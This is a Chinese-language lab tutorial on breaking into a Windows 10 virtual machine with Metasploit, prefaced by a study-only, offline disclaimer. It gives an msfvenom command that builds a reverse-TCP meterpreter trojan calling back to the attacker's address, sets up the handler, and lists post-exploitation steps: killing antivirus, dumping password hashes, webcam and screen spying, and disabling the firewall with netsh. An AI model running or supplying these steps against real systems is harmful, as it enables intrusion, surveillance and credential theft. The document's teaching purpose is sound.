本文章仅限学习,切勿违法乱用
注意:本次实验仅可在自己电脑,且断开网络的情况下进行,不可入侵他人电脑,千万注意要遵纪守法
使用metasploit(MSF) 和 木马 入侵win10 虚拟机
0x01 实验环境
攻击机:kali linux
ip:192.168.171.128
目标机:windows 10 家庭普通版(虚拟机)
ip:物理主机
0x02配置msf
1.开启数据库服务 service postgresql start
2.初始化数据库 msfdb init
3.进入msf
4.
加载模块,显示参数
5.
修改参数
LHOST为攻击机ip,LPORT为监听端口
6.开始监听
0x03 木马
1.生成木马(LHOST为攻击机ip,LPORT为监听端口)
─(root💀kali)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.128 LPORT=1234 -f exe -o win7-1.exe
2.将木马复制到win10(虚拟机)电脑上
0x04 入侵
打开木马程序
攻击机收到数据
msf exploit(handler) > sessions(查看上钩的用户)
msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
进入meterpreter了,即可进行一些相关的木马操作
0x05 入侵成功 进行操作
执行杀死杀毒软件进程操作
获取目标主机用户的哈希值(需要先获得管理员权限,输入getsystem获得,输入getuid获得当前权限)
获取实时屏幕
开启摄像头,并监控
远程关闭防火墙
netsh advfirewall set allprofiles state off
效果如下:
输入shell
进入shell界面
echo hello who are you? > 1.txt echo + 内容 > 文档名
type +文件名 打开文档
出现乱码时,输入 chcp 65001